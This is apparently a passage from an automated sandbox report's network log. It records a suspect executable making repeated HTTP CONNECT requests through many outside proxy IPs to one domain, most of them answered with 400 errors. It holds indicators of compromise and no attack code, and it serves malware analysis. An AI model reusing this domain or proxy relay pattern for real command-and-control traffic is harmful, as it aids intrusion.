                                                                                                      Feb 23, 2024 09:45:19.682224035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.865808010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.866436005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.866126060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      173192.168.2.4505135.196.111.30204816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.567301035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      174192.168.2.45050065.21.255.19731286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.568145990 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:16.756938934 CET75INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:17.167129993 CET103INHTTP/1.1 400 Bad Request
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                      Data Ascii: 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      175192.168.2.450510185.129.250.183322846812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.573143959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.039134026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.584343910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:18.679853916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      176192.168.2.45051487.106.114.12460056812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.875499964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      177192.168.2.450375117.160.250.134806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.876110077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.419210911 CET303INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty
                                                                                                      Date: Fri, 23 Feb 2024 08:45:17 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 154
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      178192.168.2.45052813.81.217.201806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.876629114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.334233999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.850045919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:18.834590912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.902873993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.893634081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.903736115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.835066080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.459645033 CET835INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:41 GMT
                                                                                                      Server: Apache/2.4.29 (Ubuntu)
                                                                                                      Content-Length: 643
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 63 69 62 65 72 73 65 67 75 72 69 64 61 64 40 61 75 64 65 61 2e 65 73 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ciberseguridad@audea.es to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      179192.168.2.450475116.199.170.1741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.876647949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      180192.168.2.45033639.165.0.13790026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.876737118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.447271109 CET311INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:17 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      181192.168.2.45051965.21.188.1880806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.876768112 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:17.067178011 CET75INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:17.358227968 CET103INHTTP/1.1 400 Bad Request
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                      Data Ascii: 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      182192.168.2.45048827.75.152.19110806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.876781940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      183192.168.2.449941208.87.131.151493146812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.876833916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.881189108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.975290060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.975336075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.975238085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:52.974967003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      184192.168.2.450535157.185.161.100265896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.876975060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      185192.168.2.449910109.123.254.43180726812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.877029896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.881165981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.975295067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.975352049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      186192.168.2.450524104.18.136.28806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.969319105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.057169914 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:17 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      187192.168.2.449826111.3.102.135300016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.978296041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      188192.168.2.450085172.67.181.89806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.989063025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.077295065 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:17 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      189192.168.2.450086172.64.80.55806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.989346027 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.077603102 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:17 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      190192.168.2.450284142.54.236.9741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.989902973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      191192.168.2.450006130.193.123.3456786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.993022919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      192192.168.2.450010212.174.79.16580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.993206978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      193192.168.2.45002588.255.217.44108206812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.993298054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      194192.168.2.450120166.62.53.45513506812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.993361950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      195192.168.2.45013672.210.208.10141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.994179010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      196192.168.2.450072185.215.160.118350106812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.994328976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      197192.168.2.45004439.109.113.9731286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.994522095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.037487030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.821588993 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.16.1
                                                                                                      Date: Fri, 23 Feb 2024 08:24:57 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      198192.168.2.45015551.15.241.5163796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
